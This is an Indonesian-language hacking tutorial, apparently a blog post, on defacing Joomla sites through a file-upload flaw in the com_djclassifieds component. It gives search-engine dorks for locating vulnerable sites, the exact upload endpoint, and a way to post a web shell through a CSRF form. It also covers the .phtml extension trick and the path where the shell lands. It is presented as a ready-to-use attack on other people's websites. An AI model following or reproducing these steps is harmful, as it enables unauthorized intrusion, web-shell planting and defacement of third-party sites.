Deface metode Joomla com_djclassifieds File Upload Vulnerability

Hey gan kali gw akan share deface metode com_djclassifieds, ok langsung simak ae

Bahan2 yg dibutuhin

- Hp / Pc

- Internet (ya iya lah)

- CSRF offline / CSRF online

Oh iya CSRF offline filetype na bisa diganti misal : shell.php

simpan CSRF offline ext:html/htm

- Exploit

index.php?option=com_djclassifieds&task=upload&tmpl=component

- Dork

inurl:/com_djclassifieds

inurl:/components/com_djclassifieds/

Kembangin lagi biar dapet web yang vuln

Oh ya dork juga bisa dicari digambar

Misal seperti ini

masukan Exploit nya 

index.php?option=com_djclassifieds&task=upload&tmpl=component

Contoh

site.com/components/com_djclassifieds

site.com/index.php?option=com_djclassifieds&task=upload&tmpl=component

atau

site.com/[path]/components/com_djclassifieds
site.clm/[path]/index.php?option=com_djclassifieds&task=upload&tmpl=component

Ciri ciri vuln

Copy link pastekan / tempel ke csrf tadi

Atau kalau yg g mau repot bisa juga sih menggunakan csrf online "Post File : file"

Oh iya ext shell cuman bisa phtml g bisa php
kalau beruntung shell lu g bakal pecah :)

Letak shell na?

site.com/tmp/djupload/shell.phtml
site.com/[path]/tmp/djupload/shell.phtml

Ok sekian dulu dari gw
Mohon maaf bila ada salah kata
Namanya juga belajar wkwk